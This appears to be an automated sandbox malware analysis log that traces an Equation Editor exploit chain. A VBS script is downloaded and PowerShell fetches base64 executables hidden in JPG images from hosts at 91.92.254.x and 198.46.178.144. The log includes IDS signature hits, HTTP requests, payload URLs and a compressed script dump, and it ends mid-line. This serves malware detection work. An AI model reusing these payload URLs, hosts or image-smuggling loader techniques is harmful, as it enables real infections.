                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.144:80 -> 192.168.2.22:49164
                  Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.144:80 -> 192.168.2.22:49166
                  Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 91.92.254.194:80 -> 192.168.2.22:49167
                  Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 91.92.254.194:80 -> 192.168.2.22:49167
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.194:80 -> 192.168.2.22:49167
                  Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.144:80 -> 192.168.2.22:49169
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.14 80Jump to behavior
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.41bb700.2.raw.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0539 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_034A0539
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /controlfirebase65.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 198.46.178.144 198.46.178.144
                  Source: Joe Sandbox ViewIP Address: 91.92.254.14 91.92.254.14
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /controlfiredatinloverforxlammfile.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/negrocock/file_omquennq.l51.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.144
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0539 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_034A0539
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/vbscriptContent-Encoding: gzipLast-Modified: Thu, 04 Jul 2024 18:55:49 GMTAccept-Ranges: bytesETag: "80a8edc843ceda1:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Fri, 05 Jul 2024 05:26:21 GMTContent-Length: 694Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 96 4b 6f da 40 14 85 cf ba 52 ff 03 62 11 b5 52 4b 12 d4 2c 52 a9 8b 84 a6 24 c5 35 a4 21 72 c5 26 0a 06 82 63 30 2f 3b 8d f2 e3 db 7e f7 62 a2 54 5d 74 6f 8d e6 75 df e7 8c 87 e1 f7 af cf 4a 34 57 8d de 55 ae 47 5d b2 2f d4 51 a8 89 02 9d 6b c3 be a3 29 fa 16 fb 48 3d 0d 99 63 b7 c8 b4 d0 b5 4e b4 66 17 b0 4f f4 a4 01 7a 9b d7 6a e3 91 a0 8d 74 8a fd a9 52 e2 46 c4 8f 35 c2 26 a5 d9 2a 64 0e d1 14 78 64 44 1b 50 47 8a 6f 87 39 d0 2d ab 94 28 03 6c be b3 b2 dc 29 ba 36 91 06 58 6f 23 04 b4 47 ad a8 3f d0 3b b0 7c 75 59 ca be 07 82 a5 57 17 d1 db 54 73 4f 55 e6 3f 65 bc 76 1c 57 68 96 e0 5b 13 3d a6 0d 41 1e 61 15 91 b7 a7 31 56 09 38 17 e4 8b 68 13 34 73 f7 33 9c 2b e2 18 62 93 04 8e 30 47 53 20 9b 93 6b 49 1d 4f 58 45 20 0b 61 72 e2 da 07 34 63 64 0b d6 8f ce e1 ad d7 14 92 e9 52 77 ec ba ec c6 9a e9 b5 5e 51 dd 18 af ea 9c 4f 4d 9f e8 2d a2 8d f1 ce 19 bb 78 dd 33 c7 ec de a8 ae 6f 60 fe c1 18 a8 a9 86 e3 5f c3 99 8d 5b e9 b9 fa b4 1e 96 6f 9d a1 aa 30 d3 c0 6f 09 ce 0c 7e ea d8 9d 81 b2 ee df 73 1d 14 39 6d a9 8f da a7 1d eb 10 eb 63 e7 a7 a9 23 7d 60 3e 64 dc 27 ee c6 99 da e8 86 fa 7b ba 40 96 21 b9 43 b6 20 a7 f5 14 d9 84 ca 66 c8 6f 90 cc c9 5f 78 de 8c 55 03 f9 91 c7 37 4e f3 b2 82 2f e0 99 79 ec 6a 31 7e e5 b8 47 8e ea 02 14 d5 b9 67 86 2d f7 1b 56 50 fb f6 d6 35 75 40 ab f1 5d 4d 1d b7 a1 ae 95 ad 2a bf 99 5b a4 d5 39 45 fb 9d dc c0 ca 82 78 76 ff fa 74 bb 97 2f cf 6e f7 86 c7 e0 b1 f3 eb 38 7f 31 63 02 d6 16 f1 fb f4 80 53 eb a2 0d d1 af a8 fc 9c 1a 42 a2 3d 20 ef 93 27 65 7d 82 7f c4 6a 50 9e 69 8a fd 08 cf 0e d2 21 ec 46 60 c8 fc e4 ac d6 1e cc b7 c8 60 38 4f 18 ef 89 38 63 9f 3a 6b 76 62 c6 df 12 af 82 fc 57 c8 6f bd a6 d4 eb ea c3 e2 35 b1 0b 22 19 c7 43 f6 a6 6d ff 85 6d f7 fe 55 05 db ff df bf 88 68 31 fa 84 e8 b9 df e3 a9 7f d9 b3 e7 17 6f c7 4d 55 38 69 10 a7 28 df 3d fb d2 7f 96 6f d8 0e 77 4d ef c9 6b 2f d5 dc eb 19 b9 a5 b5 9a f6 2a f5 db b5 f7 8c 6c fb ee 1e f8 68 a7 55 94 6f 6f b5 ef 45 08 3b 39 76 09 19 ef 1c ef d9 8b ff 1d 67 e5 d9 db 4b 5d dd ff c6 ff 72 f0 67 00 06 82 f6 b3 a6 0d 00 00 Data Ascii: Ko@RbRK,R$5!r&c0/;~bT]touJ4WUG]/Qk)H=cNfOzjtRF5&*dxdDPGo9-(l)6Xo#G?;|uYWTsOU?evWh[=Aa1V8h4s3+b0GS kIOXE ar4cdRw^QOM-x3o`_[o0o~s9mc#}`>d'{@!C fo_xU7N/yj1~Gg-VP5u@]M*[9Exvt/n81cSB= 'e}jPi!F``8O8c:kvbWo5"CmmUh1oMU8i(=
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\controlfiredatinloverforxlammfile[1].vbsJump to behavior
                  Source: global trafficHTTP traffic detected: GET /controlfiredatinloverforxlammfile.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/negrocock/file_omquennq.l51.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.14
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /controlfirebase65.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144
                  Source: powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/controlfirebase65.txt
                  Source: EQNEDT32.EXE, 00000002.00000002.454364905.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.454364905.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/controlfiredatinloverforxlammfile.vbs
                  Source: EQNEDT32.EXE, 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/controlfiredatinloverforxlammfile.vbsj
                  Source: powershell.exe, 00000006.00000002.517243140.0000000002B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.144/madamwebbbbbbbas6444.txt
                  Source: wscript.exe, 00000005.00000003.523031295.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523460331.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523198937.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523432581.0000000000877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523322277.0000000000877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523241437.0000000000875000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523254421.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92
                  Source: wscript.exe, 00000005.00000003.523270494.000000000087F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.2
                  Source: powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.25
                  Source: wscript.exe, 00000005.00000003.523031295.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523342115.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523448884.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.137/imge/new-image_
                  Source: powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.137/imge/new-image_j.jpg
                  Source: wscript.exe, 00000005.00000002.523380515.0000000000147000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523415610.0000000000840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523260557.000000000083C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523415610.0000000000837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523316147.000000000083F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523303828.000000000084F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523334720.000000000083F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523267448.0000000000836000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000865000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523297099.0000000000867000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523325540.0000000000837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523278836.0000000000865000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523422586.0000000000868000.00000004.00000020.00020000.00000000.sdmp, controlfiredatinloverforxlammfile.vbs.2.dr, controlfiredatinloverforxlammfile[1].vbs.2.drString found in binary or memory: http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txt
                  Source: wscript.exe, 00000005.00000002.523435713.000000000087A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523359546.000000000087A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523248042.0000000000879000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523241437.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txtz
                  Source: powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194
                  Source: powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpg
                  Source: powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpgOls;
                  Source: AddInProcess32.exe, 00000008.00000002.479192755.00000000024AD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002490000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000228B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.0000000002320000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000233E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.000000000249E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002494000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023EB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.0000000002350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.000000000236D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022BB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 